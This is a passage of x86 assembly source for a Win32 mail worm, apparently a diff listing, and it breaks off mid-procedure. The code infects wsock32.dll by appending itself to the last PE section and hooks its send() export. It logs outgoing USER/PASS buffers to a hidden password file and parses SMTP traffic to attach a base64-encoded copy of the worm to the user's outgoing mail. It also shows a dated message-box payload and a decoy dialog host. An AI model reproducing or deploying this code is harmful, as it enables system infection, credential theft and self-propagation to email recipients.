ic-infect_wsock.inc ]===========================; + +INFECT_WSOCK proc + + WsockSetSystemDirectory: + call SET_SYSDIR + + CopyWSockFile: + push 00h + lea eax, [ebp + wsock32inf] + push eax + lea eax, [ebp + wsock32dll] + push eax + lea eax, [ebp + ACopyFile] + call GETAPI + + SearchWsockFile: + mov [ebp + infectionflag], 00h + lea eax, [ebp + myfinddata] ; win32 finddata structure + push eax + lea eax, [ebp + wsock32inf] ; get wsock32.inf + push eax + lea eax, [ebp + AFindFirstFile] ; find the first file + call GETAPI + cmp eax, 0FFFFFFFh + je WsockEndSearch + + GoInfectWsockInf: + mov ecx, [ebp + myfinddata.fd_nFileSizeLow] ; ecx = filesize + mov [ebp + filesize], ecx ; save the filesize + add ecx, Leap - Start + 1000h ; filesize + virus + mov [ebp + memory], ecx ; + workspace = memory + call INFECT_FILE + cmp [ebp + infectionflag], 01 + je DeleteWsockFile + + call CREATE_INI_FILE + jmp WsockEndSearch + + DeleteWsockFile: + lea eax, [ebp + wsock32inf] + push eax + lea eax, [ebp + ADeleteFile] + call GETAPI + + 
DeleteIniFile2: + call SET_WINDIR + lea eax, [ebp + inifile] + push eax + lea eax, [ebp + ADeleteFile] + call GETAPI + + WsockEndSearch: + ret + +INFECT_WSOCK endp + +;=========================[ ic-infect_file.inc ]============================; + +INFECT_FILE proc + + SetAttributesToNormal: + push 80h + lea esi, [ebp + myfinddata.fd_cFileName] ; esi = filename + push esi + lea eax, [ebp + ASetFileAttributes] + call GETAPI + + OpenFile: + push 0 ; template handle=0 + push 20h ; attributes=any file + push 3 ; type= existing file + push 0 ; security option = 0 + push 1 ; shared for read + push 80000000h or 40000000h ; generic read write + push esi ; offset file name + lea eax, [ebp + ACreateFile] + call GETAPI + + cmp eax, 0FFFFFFFFh + je InfectionError + mov [ebp + filehandle], eax + +;-------------------------------[ map file ]---------------------------------; + + CreateFileMapping: ; allocates the memory + push 0 ; filename handle = 0 + push dword ptr [ebp + memory] ; max size = memory + push 0 ; minumum size = 0 + push 4 ; read / write access + push 0 ; sec. attrbs= default + push dword ptr [ebp + filehandle] + lea eax, [ebp + ACreateFileMapping] + call GETAPI ; eax = new map handle + + mov [ebp + maphandle], eax + or eax, eax + jz CloseFile + + MapViewOfFile: + push dword ptr [ebp + memory] ; memory to map + push 0 ; file offset + push 0 ; file offset + push 2 ; file map write mode + push eax ; file map handle + lea eax, [ebp + AMapViewOfFile] ; ok map the file + call GETAPI + + or eax, eax + jz CloseMap + mov esi, eax ; esi= base of map + mov [ebp + mapaddress], esi ; save that base + + DoSomeChecks: + cmp word ptr [esi], 'ZM' ; an exe file? + jne UnmapView + cmp word ptr [esi + 38h], 'll' ; already infected? + jne OkGo + mov [ebp + infectionflag], 1 ; set infectionflag + jmp UnmapView + + OkGo: + mov ebx, dword ptr [esi + 3ch] + cmp ebx, 200h + ja UnmapView + add ebx, esi + cmp dword ptr [ebx], 'EP' ; is it a PE file ? 
+ jne UnmapView + + mov [ebp + PEheader], ebx ; save ra PE header + mov esi, ebx + mov eax, [esi + 34h] + mov [ebp + imagebase], eax ; save imagebase + +;------------------------------[ append section ]----------------------------; + + LocateBeginOfLastSection: + movzx ebx, word ptr [esi + 20d] ; optional header size + add ebx, 24d ; file header size + movzx eax, word ptr [esi + 6h] ; no of sections + dec eax ; (we want the last-1 + mov ecx, 28h ; sectionheader) + mul ecx ; * header size + add esi, ebx ; esi = begin of last + add esi, eax ; section's header + + ChangeLastSectionHeader: + or dword ptr [esi + 24h], 00000020h or 20000000h or 80000000h + + NewAlignedPhysicalSize: + mov eax, dword ptr [esi + 10h] ; old phys size + push eax ; save it + + add eax, Leap-Start + mov ecx, [ebp + PEheader] + mov ecx, [ecx + 38h] + div ecx ; and align it to + inc eax ; the sectionalign + mul ecx + mov dword ptr [esi + 10h], eax ; save it + + VirtualSizeCheck: + mov edi, dword ptr [esi + 8h] ; get old + cmp eax, edi ; virtualsize + jge NewVirtualSize + + VirtualSizeIsVirtual: + add edi, Leap-Start + mov eax, edi + mov ecx, [ebp + PEheader] + mov ecx, [ecx + 38h] + div ecx ; and align it to + inc eax ; the sectionalign + mul ecx + + NewVirtualSize: + mov [esi + 8h], eax ; save new value + + NewAlignedImageSize: + mov eax, dword ptr [esi + 0ch] ; get virtual offset + add eax, dword ptr [esi + 8h] ; + new virtual size + mov [ebp + imagesize], eax ; = new imagesize + + NewAlignedFileSize: + mov eax, dword ptr [esi + 10h] ; get new phys size + add eax, dword ptr [esi + 14h] ; add offset of phys + mov ecx, [ebp + PEheader] + mov ecx, [ecx + 3ch] + div ecx ; and align it to + inc eax ; the filealign + mul ecx + mov [ebp + filesize], eax ; size = filesize + + CalculateNewWsockApiAddress: + pop eax + push eax + add eax, dword ptr [esi + 0ch] ; + virtual offset + add eax, InterceptWsockApiCall - Start ; + ip + mov [ebp + wnewapiaddress], eax ; new api address + jmp HookDaApi + + 
HookDaApi: + push esi + call HOOK_API + pop esi + + CopyVirusToEndOfFile: + pop eax + mov edi, eax + add edi, [ebp + mapaddress] ; mapaddress + add edi, [esi + 14h] ; add raw data offset + lea esi, [ebp + Start] ; copy virus + mov ecx, (Leap-Start)/4 + 4 + cld + rep movsd + + UpdatePEHeaderWithChanges: + mov esi, [ebp + mapaddress] + mov word ptr [esi + 38h], 'll' ; set infectionmark + mov esi, [ebp + PEheader] + mov eax, [ebp + imagesize] + mov [esi + 50h], eax ; set new imagesize + +;--------------------------------[ unmap file ]------------------------------; + + UnmapView: + push dword ptr [ebp + mapaddress] + lea eax, [ebp + AUnmapViewOfFile] + call GETAPI + + CloseMap: + push dword ptr [ebp + maphandle] + lea eax, [ebp + ACloseHandle] + call GETAPI + + push 0 + push 0 + push dword ptr [ebp + filesize] + push dword ptr [ebp + filehandle] + lea eax, [ebp + ASetFilePointer] + call GETAPI + + push dword ptr [ebp + filehandle] + lea eax, [ebp + ASetEndOfFile] + call GETAPI + +;--------------------------------[ close file ]------------------------------; + + CloseFile: + push dword ptr [ebp + myfinddata.fd_ftLastWriteTime] + push dword ptr [ebp + myfinddata.fd_ftLastAccessTime] + push dword ptr [ebp + myfinddata.fd_ftCreationTime] + push dword ptr [ebp + filehandle] + lea eax, [ebp + ASetFileTime] + call GETAPI + + push [ebp + filehandle] + lea eax, [ebp + ACloseHandle] + call GETAPI + + InfectionError: + push dword ptr [ebp + myfinddata.fd_dwFileAttributes] + lea eax, [ebp + myfinddata.fd_cFileName] + push eax + lea eax, [ebp + ASetFileAttributes] + call GETAPI + ret + +INFECT_FILE endp + +;===========================[ ic-hook_api.inc ]=============================; + +HOOK_API proc + + LoadWSockExportTableData: + mov edi, [ebp + PEheader] + mov esi, dword ptr [edi + 78h] ; rva export table + + mov edx, esi ; get RVA + call RVA_TO_RAW + mov esi, ecx + mov eax, dword ptr [esi + 18h] + mov [ebp + numberofnames], eax ; save number of names + + push esi + mov eax, 
dword ptr [esi + 1Ch] ; get ra of table with + + mov edx, eax + call RVA_TO_RAW + mov eax, ecx ; pointers to funtion + mov [ebp + addressoffunctions], eax ; addresses + + pop esi + push esi + mov eax, dword ptr [esi + 20h] ; get ra of table with + + mov edx, eax + call RVA_TO_RAW + mov eax, ecx ; pointers to names + mov [ebp+addressofnames], eax ; of functions + + pop esi + push esi + + mov eax, dword ptr [esi + 24h] ; get ra of table with + mov edx, eax + call RVA_TO_RAW + mov eax, ecx ; pointers to ordinals + mov [ebp+addressofordinals], eax ; of functions + pop esi + + BeginSendAddressSearch: + mov esi, [ebp + addressofnames] ; search for + mov [ebp + AONindex], esi ; API in names + mov edi, [esi] ; table + + mov edx, edi + call RVA_TO_RAW + mov edi, ecx + xor ecx, ecx + + HookSendApi: + lea ebx, [ebp + ASend] + + OkTryAgain: + mov esi, ebx + + MatchByteNow: + cmpsb + jne NextOneNow + cmp byte ptr [esi], 0 ; did the entire string + je YesGotIt ; match ? + jmp MatchByteNow + + NextOneNow: + inc cx + add dword ptr [ebp + AONindex], 4 ; get next namepointer + mov esi, [ebp + AONindex] ; in table (4 dwords) + mov edi, [esi] + + push ebx + push ecx + + mov ebx, [ebp + mapaddress] + mov edx, edi + call RVA_TO_RAW + mov edi, ecx + + pop ecx + pop ebx + jmp OkTryAgain + + YesGotIt: + shl ecx, 1 + mov esi, [ebp + addressofordinals] ; ordinal = nameindex * + add esi, ecx ; size of ordinal entry + xor eax, eax ; + ordinal table base + mov ax, word ptr [esi] ; offset of address + shl eax, 2 ; of function = ordinal + mov esi, [ebp + addressoffunctions] ; * size of entry of + add esi, eax ; address table + mov edi, dword ptr [esi] ; get address + + SaveNewWsockApiAddress: + mov [ebp + woldapiaddress], edi ; save it + + ChangeWsock: + mov eax, dword ptr [ebp + wnewapiaddress] ; new api address + mov dword ptr [esi], eax ; set it + ret + +HOOK_API endp + +;===========================[ ic-rva_to_raw.inc ]===========================; + +RVA_TO_RAW proc + + ; In: edx - RVA to 
convert + ; Out: ecx - Pointer to RAW data or NULL if error + + GetRaw: + mov ebx, [ebp + mapaddress] + mov [ebp + rva2raw], edx + + mov esi, dword ptr [ebx + 3ch] + add esi, ebx ; esi=offset peheader + xor ecx, ecx + mov cx, word ptr [esi + 06h] ; ecx = nr. of sections + xor edi, edi + mov di, word ptr [esi + 20d] ; optional header size + add esi, 24d ; file header size + add edi, esi + + FindCorrespondingSection: + mov eax, dword ptr [ebp + rva2raw] ; rva we want into raw + mov edx, dword ptr [edi + 12d] ; section RVA + sub eax, edx + cmp eax, dword ptr [edi+08d] ; section size + jb SectionFound + + NotThisSection: + add edi, 40d + loop FindCorrespondingSection + + EndRawSearch: + ret + + SectionFound: + mov ecx, dword ptr [edi+20d] ; pntr to section's raw + sub edx, ecx ; data from beginning + add ecx, eax ; of file + add ecx, ebx + ret + +RVA_TO_RAW endp + +;=========================[ ic-create_ini_file.inc ]========================; + +CREATE_INI_FILE proc + + IniGetSetWindowsDir: + call SET_WINDIR + + CreateInstallIni: + push 0 ; template handle=0 + push 20h ; attributes=any file + push 4 ; type= new file + push 0 ; security option = 0 + push 1 ; shared for read + push 80000000h or 40000000h ; generic read write + lea eax, [ebp + inifile] + push eax ; offset file name + lea eax, [ebp + ACreateFile] + call GETAPI + mov [ebp + filehandle], eax + + SetIniFilePointerToEnd: + push 02h + push 00h + push 00h + push [ebp + filehandle] + lea eax, [ebp + ASetFilePointer] + call GETAPI + mov dword ptr [ebp + writtensize], 00h + + WriteInstallIniLoop: + lea esi, [ebp + inicrlf] + xor ecx, ecx + call StringSize + call Write + + lea esi, [ebp + rename] ; write 'rename' + mov word ptr [ebp + writtensize], 0Ah + call Write + + lea esi, [ebp + sysdir] ; write systemdir + xor ecx, ecx + call StringSize + call Write + + lea esi, [ebp + slashsign] ; write slash + xor ecx, ecx + call StringSize + call Write + + WriteWsock32Dll: + lea esi, [ebp + wsock32dll] ; write original dll + 
xor ecx, ecx + call StringSize + call Write + + WriteOn: + lea esi, [ebp + equalsign] ; write original dll + xor ecx, ecx + call StringSize + call Write + + lea esi, [ebp + sysdir] ; write systemdir + xor ecx, ecx + call StringSize + call Write + + lea esi, [ebp + slashsign] ; write slash + xor ecx, ecx + call StringSize + call Write + + WriteInfectedWsock: + lea esi, [ebp + wsock32inf] ; write original dll + xor ecx, ecx + call StringSize + call Write + jmp CloseInstallIni + + StringSize: + cmp byte ptr [esi + ecx], 0h + je GotSize + inc ecx + jmp StringSize + + GotSize: + mov word ptr [ebp + writtensize], cx + ret + + Write: + push 0h + lea eax, [ebp + writtenbytes] + push eax + xor eax, eax + mov ax, word ptr [ebp + writtensize] + push eax + push esi + push dword ptr [ebp + filehandle] + lea eax, [ebp + AWriteFile] + call GETAPI + ret + + CloseInstallIni: + lea esi, [ebp + inicrlf] ; write original dll + xor ecx, ecx + call StringSize + call Write + + push dword ptr [ebp + filehandle] + lea eax, [ebp + ACloseHandle] + call GETAPI + ret + +CREATE_INI_FILE endp + +;=========================[ ic-copy_host_file.inc ]=========================; + +COPY_HOST_FILE proc + + GetCurrentHostPath: + push 100h + lea eax, [ebp + currentdir] + push eax + push 00h + lea eax, [ebp + AGetModuleFileName] + call GETAPI + + SetSysDirectory: + call SET_SYSDIR + + CopyWormHostFile: + push 00h + lea eax, [ebp + wsock2] + push eax + lea eax, [ebp + currentdir] + push eax + lea eax, [ebp + ACopyFile] + call GETAPI + ret + +COPY_HOST_FILE endp + +;=========================[ ic-ws_intercept.inc ]===========================; + +INTERCEPT_WSOCK proc + + InterceptWsockApiCall: + push ebp + call GetDelta + + GetDelta: + pop ebp + sub ebp, offset GetDelta + pushad + + CheckStatus: + mov eax, [esp+(8*4)+(1*4)+4 + 0] ; get send() socket + mov [ebp + socketh], eax ; save it + mov esi, [esp+(8*4)+(1*4)+4 + 4] ; send() buffer + mov ecx, [esp+(8*4)+(1*4)+4 + 8] ; size of buffer + + pushad + call 
GET_GETPROCADDRESS_API_ADDRESS + popad + + CheckForSecurityInfo: + cmp [esi], 'RESU' + je StoreBufferData + cmp [esi], 'SSAP' + jne DontStore + + StoreBufferData: + pushad + call WRITE_TO_FILE + popad + + DontStore: + cmp [ebp + status], 00h ; monitoring==true ? + je CheckMailFrom ; yes, we are + cmp [ebp + status], 02h + je CheckRcptTo + cmp [ebp + status], 03h + je CheckMimeFrom + cmp [ebp + status], 05h + je CheckQuit + jmp Continue + + CheckMailFrom: + mov esi, [esp+(8*4)+(1*4)+4 + 4] ; send() buffer + mov ecx, [esp+(8*4)+(1*4)+4 + 8] ; size of buffer + cmp [esi], 'LIAM' + jne Continue + + StoreMailFromTag: + pushad + call WRITE_TO_FILE + popad + + SaveMailFrom: + mov [ebp + fromsize], ecx + push ecx + push esi + + push ecx + push 00h + lea eax, [ebp + AGlobalAlloc] + call GETAPI + + or eax, eax + jz ErrorWhileSending + + pop esi + pop ecx + mov [ebp + fromaddress], eax + mov edi, eax + rep movsb + mov [ebp + status], 02h + + CheckRcptTo: + mov esi, [esp+(8*4)+(1*4)+4 + 4] ; send() buffer + mov ecx, [esp+(8*4)+(1*4)+4 + 8] ; size of buffer + cmp [esi], 'TPCR' + jne CheckData + + AllocateRcptMemory: + cmp [ebp + rcptnumber], 00h + jne SaveRcptTo + + push ecx + push esi + + push 500h + push 00h + lea eax, [ebp + AGlobalAlloc] + call GETAPI + or eax, eax + jz ErrorWhileSending ; mem for rctp email + mov [ebp + rcpt_buffer_address], eax ; addresses + + push 100h + push 00h + lea eax, [ebp + AGlobalAlloc] + call GETAPI + or eax, eax + jz ErrorWhileSending ; mem for size of rctp + mov [ebp + rcpt_size_address], eax ; email addresses + + pop esi + pop ecx + + SaveRcptTo: + push ecx ; store rcpt string + mov edi, [ebp + rcpt_buffer_address] + mov eax, [ebp + totalrcptsize] + add edi, eax + rep movsb + pop ecx + + mov edi, [ebp + rcpt_size_address] ; store rcpt string size + mov eax, [ebp + rcptnumber] + mov edx, 04h + mul edx + add edi, eax + mov dword ptr [edi], ecx + + mov eax, [ebp + totalrcptsize] ; calculate total size + add eax, ecx ; of rcpts + mov [ebp + 
totalrcptsize], eax + + mov eax, [ebp + rcptnumber] ; calculate number of + add eax, 01h ; rcpt we have + mov [ebp + rcptnumber], eax + jmp Continue + + CheckData: + mov esi, [esp+(8*4)+(1*4)+4 + 4] ; send() buffer + mov ecx, [esp+(8*4)+(1*4)+4 + 8] ; size of buffer + cmp [esi], 'ATAD' + jne Continue + mov [ebp + status], 03h + + CheckMimeFrom: + mov esi, [esp+(8*4)+(1*4)+4 + 4] ; send() buffer + mov ecx, [esp+(8*4)+(1*4)+4 + 8] ; size of buffer + + MimeFromLoop: + lea edi, [ebp + fromtag] + push ecx + push esi + mov ecx, 05h + rep cmpsb + pop esi + pop ecx + je SearchMimeFromEnd + inc esi + loop MimeFromLoop + + CheckMimeTo: + mov esi, [esp+(8*4)+(1*4)+4 + 4] + mov ecx, [esp+(8*4)+(1*4)+4 + 8] + + MimeToLoop: + lea edi, [ebp + totag] + push ecx + push esi + mov ecx, 03h + rep cmpsb + pop esi + pop ecx + je SearchMimeToEnd + inc esi + loop MimeToLoop + jmp CheckQuit + + SearchMimeFromEnd: + push esi + + FromEndLoop: + lea edi, [ebp + mimeendtag] + push ecx + push esi + mov ecx, 01h + rep cmpsb + pop esi + pop ecx + je SaveMimeFrom + inc esi + loop FromEndLoop + + pop esi + jmp Continue + + SaveMimeFrom: + mov eax, esi + pop esi + sub eax, esi + mov ecx, eax + add ecx, 03h + mov [ebp + mimefromsize], ecx + push esi + push ecx + + push ecx + push 00h + lea eax, [ebp + AGlobalAlloc] + call GETAPI + or eax, eax + jz MimeError + mov [ebp + mimefrom_address], eax + + pop ecx + pop esi + mov edi, eax + rep movsb + + mov [ebp + fromstatus], 01h + cmp [ebp + tostatus], 01h + jne CheckMimeTo + mov [ebp + status], 05h + jmp CheckQuit + + SearchMimeToEnd: + push esi + + ToEndLoop: + lea edi, [ebp + toendtag] + push ecx + push esi + mov ecx, 08h + rep cmpsb + pop esi + pop ecx + je SaveMimeTo + inc esi + loop ToEndLoop + + pop esi + jmp Continue + + SaveMimeTo: + mov eax, esi + pop esi + sub eax, esi + mov ecx, eax + mov [ebp + mimetosize], ecx + push esi + push ecx + + push ecx + push 00h + lea eax, [ebp + AGlobalAlloc] + call GETAPI + or eax, eax + jz MimeError + mov [ebp + 
mimeto_address], eax + + pop ecx + pop esi + mov edi, eax + rep movsb + + mov [ebp + tostatus], 01h + cmp [ebp + fromstatus], 01h + jne CheckMimeFrom + mov [ebp + status], 05h + jmp CheckQuit + + MimeError: + pop ecx + pop esi + mov [ebp + status], 05h + + CheckQuit: + mov esi, [esp+(8*4)+(1*4)+4 + 4] + mov ecx, [esp+(8*4)+(1*4)+4 + 8] + cmp [esi], 'TIUQ' + jne Continue + + pushad + call SEND_MAIL + popad + + jmp InterceptionFinished + + ErrorWhileSending: + pop esi + pop ecx + + InterceptionFinished: + mov [ebp + status], 00h + mov [ebp + totalrcptsize], 00h + mov [ebp + rcptnumber], 00h + mov [ebp + tostatus], 00h + mov [ebp + fromstatus], 00h + jmp Continue + + Continue: + popad + lea eax, [ebp + InterceptWsockApiCall] ; get ep va + sub eax, dword ptr [ebp + wnewapiaddress] ; - ep RVA + add eax, dword ptr [ebp + woldapiaddress] ; = imagebase + pop ebp + jmp eax + +INTERCEPT_WSOCK endp + +;========================[ ic-ws_attachment.inc ]===========================; + +PREPARE_ATTACHMENT proc + + SetSysDir: + call SET_SYSDIR + + OpenSourceFile: + push 0 + push 0 + push 3 + push 0 + push 0 + push 80000000h + lea eax, [ebp + wsock2] + push eax + lea eax, [ebp + ACreateFile] + call GETAPI + mov [ebp + filehandle], eax ; save file handle + cmp eax, -1 + je NoBase64Encode + + GetSourceFileSize: + push 00h + push dword ptr [ebp + filehandle] + lea eax, [ebp + AGetFileSize] + call GETAPI + + or eax, eax + jz NoBase64Encode + mov [ebp + filesize], eax ; get file size + + AllocateSourceMemory: + add eax, 02h + push eax + push 00h + lea eax, [ebp + AGlobalAlloc] + call GETAPI + + or eax, eax + jz NoBase64Encode ; not enough memory? + mov [ebp + smHnd], eax ; sourcememory handle + + AllocateDestinationMemory: + mov eax, [ebp + filesize] + xor edx, edx + mov ecx, 02h + mul ecx + push eax + push 00h + lea eax, [ebp + AGlobalAlloc] + call GETAPI + + or eax, eax + jz NoBase64Encode ; not enough memory? 
+ mov [ebp + dmHnd], eax ; destinationmemory handle + + ReadSourceFile: + mov [ebp + bytesread], 00h + + push 00h + lea eax, [ebp + bytesread] + push eax + push [ebp + filesize] + push dword ptr [ebp + smHnd] + push dword ptr [ebp + filehandle] + lea eax, [ebp + AReadFile] + call GETAPI + + mov eax, dword ptr [ebp + bytesread] + or eax, eax + jz NoBase64Encode ; nothing read ? + + CloseSourceFile: + push dword ptr [ebp + filehandle] ; close the file + lea eax, [ebp + ACloseHandle] + call GETAPI + + EncodeSourceData: + mov eax, dword ptr [ebp + smHnd] + mov edx, dword ptr [ebp + dmHnd] + mov ecx, dword ptr [ebp + filesize] + call BASE64_ENCODER ; encode into Base64 + mov [ebp + encodedsize], ecx + + NoBase64Encode: + ret + +PREPARE_ATTACHMENT endp + +;=========================[ ic-ws_b64encoder.inc ]==========================; + +BASE64_ENCODER proc + + ; in: eax address of data to encode + ; edx address to put encoded data + ; ecx size of data to encode + ; + ; out: ecx size of encoded data + ; + + CheckFileSize: + push eax + push edx + push ecx + mov eax, ecx + xor edx, edx + mov ecx, 03h + div ecx + pop ecx + or edx, edx + jz EncodeBase64 + + AddTwoBytes: + cmp edx, 01h + jne AddOneByte + add ecx, 02h + jmp EncodeBase64 + + AddOneByte: + add ecx, 01h + + EncodeBase64: + pop edx + pop eax + xor esi, esi + lea edi, [ebp + encTable] + push ebp + xor ebp, ebp + + BaseLoop: + xor ebx, ebx + mov bl, byte ptr [eax] + shr bl, 2 + and bl, 00111111b + mov bh, byte ptr [edi+ebx] + mov byte ptr [edx+esi], bh + inc esi + + mov bx, word ptr [eax] + xchg bl, bh + shr bx, 4 + xor bh, bh + and bl, 00111111b + mov bh, byte ptr [edi+ebx] + mov byte ptr [edx+esi], bh + inc esi + + inc eax + mov bx,word ptr [eax] + xchg bl, bh + shr bx, 6 + xor bh, bh + and bl, 00111111b + mov bh, byte ptr [edi+ebx] + mov byte ptr [edx+esi], bh + inc esi + + inc eax + xor ebx, ebx + mov bl, byte ptr [eax] + and bl, 00111111b + mov bh, byte ptr [edi+ebx] + mov byte ptr [edx+esi], bh + inc esi + inc 
eax + + inc ebp + cmp ebp, 24 + ja AddEndOfLine + inc ebp + + AddedEndOfLine: + sub ecx, 3 + or ecx, ecx + jnz BaseLoop + + mov word ptr [edx+esi], 0a0dh + add esi, 2 + mov ecx, esi + pop ebp + ret + + AddEndOfLine: + xor ebp, ebp + mov word ptr [edx+esi], 0a0dh + add esi, 2 + jmp AddedEndOfLine + +BASE64_ENCODER endp + +;=======================[ ic-ws_write_to_file.inc ]=========================; + +WRITE_TO_FILE proc + + StoreBuffer: + push esi + push ecx + + SetEmailDropDir: + call SET_WINDIR + + CreateEmailDrop: + push 0 ; template handle=0 + push 20h ; attributes=any file + push 04h ; type= existing file + push 0 ; security option = 0 + push 1 ; shared for read + push 80000000h or 40000000h ; generic read write + lea eax, [ebp + passwordfile] + push eax ; offset file name + lea eax, [ebp + ACreateFile] + call GETAPI + mov [ebp + filehandle], eax ; save file handle + cmp eax, -1 + je BufferError + + SetDropPointer: + push 2 + push 0 + push 0 + push dword ptr [ebp + filehandle] ; filehandle + lea eax, [ebp + ASetFilePointer] + call GETAPI + + pop ecx + pop esi + + WriteBuffer: + push 0h + lea eax, [ebp + writtenbytes] + push eax + push ecx ; push buffersize + push esi ; push offset buffer + push dword ptr [ebp + filehandle] + lea eax, [ebp + AWriteFile] + call GETAPI + + CloseBufferFile: + push dword ptr [ebp + filehandle] + lea eax, [ebp + ACloseHandle] + call GETAPI + ret + + BufferError: + pop ecx + pop esi + ret + +WRITE_TO_FILE endp + +;============================[ ic-send_mail.inc ]============================; + +SEND_MAIL proc + + GetAllApiAddresses: + call GET_WSOCK32_BASE_ADDRESS + call GET_USER32_BASE_ADDRESS + call PREPARE_ATTACHMENT + + mov eax, [ebp + filehandle] + cmp eax, -1 ; attachment error + je SendError + + AllocateEmailBufferMemory: + mov eax, [ebp + encodedsize] + mov ecx, 02h + mul ecx + push eax + push 00h + lea eax, [ebp + AGlobalAlloc] + call GETAPI + + or eax, eax + jz SendError ; mem for email + mov [ebp + email_buffer_address], eax 
; buffer + + SendMailFromTag: + mov eax, dword ptr [ebp + fromaddress] + mov ecx, dword ptr [ebp + fromsize] + call SendCommand + call ReceiveReply + + SendRcptToTags: + xor ecx, ecx + mov [ebp + totalrcptsize], 00h + + RcptSendLoop: + push ecx + + mov edi, [ebp + rcpt_size_address] + mov eax, ecx + mov edx, 04h + mul edx + add edi, eax + mov ecx, dword ptr [edi] + + mov esi, [ebp + rcpt_buffer_address] + mov eax, [ebp + totalrcptsize] + add esi, eax + + pushad + mov eax, esi + call SendCommand + call ReceiveReply + popad + + add eax, ecx + mov [ebp + totalrcptsize], eax + + pop ecx + inc ecx + mov eax, [ebp + rcptnumber] + cmp ecx, eax + jne RcptSendLoop + + SendDataCommand: + lea eax, [ebp + datatag] + mov ecx, 06h + call SendCommand + call ReceiveReply + + EmailBody_EmailId: + mov [ebp + email_size], 00h + mov edi, [ebp + email_buffer_address] + lea esi, [ebp + emailid] + mov ecx, 21d + add [ebp + email_size], ecx + rep movsb + + EmailBody_EmailFrom: + cmp [ebp + fromstatus], 01h + jne EmailBody_MakeEmailFrom + + mov esi, [ebp + mimefrom_address] + mov ecx, [ebp + mimefromsize] + add [ebp + email_size], ecx + rep movsb + jmp EmailBody_EmailTo + + EmailBody_MakeEmailFrom: + lea esi, [ebp + fromtag] + mov ecx, 05h + add [ebp + email_size], ecx + rep movsb + + mov esi, dword ptr [ebp + fromaddress] + add esi, 11d + mov ecx, dword ptr [ebp + fromsize] + sub ecx, 11d + add [ebp + email_size], ecx + rep movsb + + EmailBody_EmailTo: + cmp [ebp + tostatus], 01h + jne EmailBody_MakeEmailTo + + mov esi, [ebp + mimeto_address] + mov ecx, [ebp + mimetosize] + add [ebp + email_size], ecx + rep movsb + jmp EmailBody_EmailStartPart + + EmailBody_MakeEmailTo: + lea esi, [ebp + totag] + mov ecx, 03h + add [ebp + email_size], ecx + rep movsb + + xor ecx, ecx + mov [ebp + totalrcptsize], 00h + + RcptStringLoop: + push ecx + + push edi + mov edi, [ebp + rcpt_size_address] + mov eax, ecx + mov edx, 04h + mul edx + add edi, eax + mov ecx, dword ptr [edi] + pop edi + + push ecx + mov 
esi, [ebp + rcpt_buffer_address] + mov eax, [ebp + totalrcptsize] + add esi, eax + add esi, 08h + sub ecx, 08h + add [ebp + email_size], ecx + rep movsb + + pop ecx + add eax, ecx + mov [ebp + totalrcptsize], eax + + pop ecx + inc ecx + mov eax, [ebp + rcptnumber] + cmp ecx, eax + jne RcptStringLoop + + EmailBody_EmailStartPart: + lea esi, [ebp + emailstart] + mov ecx, emailend-emailstart + add [ebp + email_size], ecx + rep movsb + + EmailBody_EmailAttachement: + mov esi, dword ptr [ebp + dmHnd] + mov ecx, [ebp + encodedsize] + add [ebp + email_size], ecx + rep movsb + + EmailBody_EmailEndPart: + lea esi, [ebp + emailtail] + mov ecx, 17d + add [ebp + email_size], ecx + rep movsb + + EmailBody_EndTag: + lea esi, [ebp + endtag] + mov ecx, 05h + add [ebp + email_size], ecx + rep movsb + + SendEmailBody: + mov eax, [ebp + email_buffer_address] + mov ecx, [ebp + email_size] + call SendCommand + call ReceiveReply + + MessageBoxDay: + lea eax, [ebp + timedate] + push eax + lea eax, [ebp + AGetSystemTime] + call GETAPI + + xor eax, eax + mov ax, word ptr [ebp + timedate.wMonth] + cmp ax, 07h + jne SendError + mov ax, word ptr [ebp + timedate.wDay] + cmp ax, 01h + jne SendError + + MessageBoxPayload: + mov eax, 0040h + push eax + lea eax, [ebp + windowtitle] + push eax + lea eax, [ebp + msgmessage] + push eax + push 00h + lea eax, [ebp + AMessageBox] + call GETUAPI + + SendError: + ret + +;-----------------------------[ send routine ]------------------------------; + + SendCommand: + push eax + + push 0h + push ecx + push eax + push dword ptr [ebp + socketh] + lea eax, [ebp + ASend] + call GETWAPI + + cmp eax, -1 + jne SendWentOk + + pop eax + jmp SendCommand + + SendWentOk: + pop eax + ret + +;--------------------------[ receive routine ]------------------------------; + + ReceiveReply: + push LARGE 0 + push LARGE 60 + lea eax, [ebp + recvbuffer] + push eax + push dword ptr [ebp + socketh] + lea eax, [ebp + ARecv] + call GETWAPI ; call the api + + cmp eax, -1 + je 
ReceiveReply + ret + +SEND_MAIL endp + +;****************************************************************************; + + Leap: + +.code + + OriginalHost: + push 0 + call GetModuleHandleA + mov hInst, eax + + CreateProgressWindow: + push 00h + push offset MYDIALOG_0 + push 00h + push 102 + push hInst + call DialogBoxParamA + + CreateMainWindow: + push 00h + push offset MYDIALOG_1 + push 00h + push 103 + push hInst + call DialogBoxParamA + + Leave: + push 0 + call ExitProcess + +;============================[ ic-host_code.inc ]============================; + +MYDIALOG_0 proc handle, umsg, wparam, lparam: dword + + CheckParameter: + cmp [umsg], WM_INITDIALOG + je CenterDlg + cmp [umsg], WM_DESTROY + je Exit + cmp [umsg], WM_CLOSE + je Exit + cmp flag, 01h + je CreateProgressThread + cmp flag, 02h + je Exit + xor eax, eax + ret + + CenterDlg: + push offset dlgrect + push handle + call GetWindowRect + call GetDesktopWindow + push offset desktoprect + push eax + call GetWindowRect + + push 00h + mov eax, dlgrect.rcBottom + sub eax, dlgrect.rcTop + mov dlgheight, eax + push eax ; height + mov eax, dlgrect.rcRight + sub eax, dlgrect.rcLeft + mov dlgwidth, eax ; width + push eax + mov eax, desktoprect.rcBottom + sub eax, dlgheight + shr eax, 1 + push eax ; bottom + mov eax, desktoprect.rcRight + sub eax, dlgwidth + shr eax, 1 + push eax ; top + push handle ; handle + call MoveWindow ; move to center + mov flag, 01h + xor eax, eax + ret + + CreateProgressThread: + push offset threadid + push 00h + push handle + push offset PROGRESS + push 00h + push 00h + call CreateThread + mov flag, 00h + xor eax, eax + ret + + Exit: + push wparam + push handle + call EndDialog + mov eax, 01h + ret + +MYDIALOG_0 endp + +MYDIALOG_1 proc handle, umsg, wparam, lparam: dword + + CheckParameter1: + cmp [umsg], WM_INITDIALOG + je CenterDlg1 + cmp [umsg], WM_DESTROY + je Exit1 + cmp [umsg], WM_CLOSE + je Exit1 + cmp [umsg], WM_COMMAND + je CheckCommand + cmp [umsg], WM_VSCROLL + je 
